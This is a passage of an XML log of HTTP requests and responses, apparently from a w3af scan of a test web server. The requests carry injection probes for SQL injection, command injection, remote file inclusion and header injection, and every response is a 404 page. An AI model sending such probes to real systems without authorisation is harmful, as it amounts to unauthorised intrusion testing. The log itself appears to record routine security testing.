                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="529">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="530">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="532">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="533">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="534">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="536">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="540">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="542">
                <http-request>
                    <status>GET http://10.12.68.43:31337/15%27+OR+%2715%27%3D%2715 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 15%27+OR+%2715%27%3D%2715 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='15%27+OR+%2715%27%3D%2715'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="556">
                <http-request>
                    <status>GET http://10.12.68.43:31337/15%27+AND+%2715%27%3D%2716 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 15%27+AND+%2715%27%3D%2716 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='15%27+AND+%2715%27%3D%2716'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="570">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14+OR+14%3D14+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14+OR+14%3D14+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14+OR+14%3D14+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="582">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14+AND+14%3D15+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14+AND+14%3D15+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14+AND+14%3D15+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="590">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="595">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="602">
                <http-request>
                    <status>GET http://10.12.68.43:31337/48+OR+48%3D48+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 48+OR+48%3D48+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='48+OR+48%3D48+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="612">
                <http-request>
                    <status>GET http://10.12.68.43:31337/48+AND+48%3D49+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 48+AND+48%3D49+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='48+AND+48%3D49+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="623">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="655">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="658">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hWGvLz0j HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about hWGvLz0j has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='hWGvLz0j'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="672">
                <http-request>
                    <status>GET http://10.12.68.43:31337/96QxEhZS HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96QxEhZS has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96QxEhZS'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="675">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="690">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="691">
                <http-request>
                    <status>GET http://10.12.68.43:31337/huthg%3C%2F-%3Ehuthg%2F%2Ahuthg%22huthghuthg%27huthghuthg%60huthghuthg+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about huthg%3C%2F-%3Ehuthg%2F%2Ahuthg%22huthghuthg%27huthghuthg%60huthghuthg+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='huthg%3C%2F-%3Ehuthg%2F%2Ahuthg%22huthghuthg%27huthghuthg%60huthghuthg+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="693">
                <http-request>
                    <status>GET http://10.12.68.43:31337/3%22+OR+%223%22%3D%223 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 3%22+OR+%223%22%3D%223 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='3%22+OR+%223%22%3D%223'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="703">
                <http-request>
                    <status>GET http://10.12.68.43:31337/QNDAQyVR HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about QNDAQyVR has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='QNDAQyVR'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="708">
                <http-request>
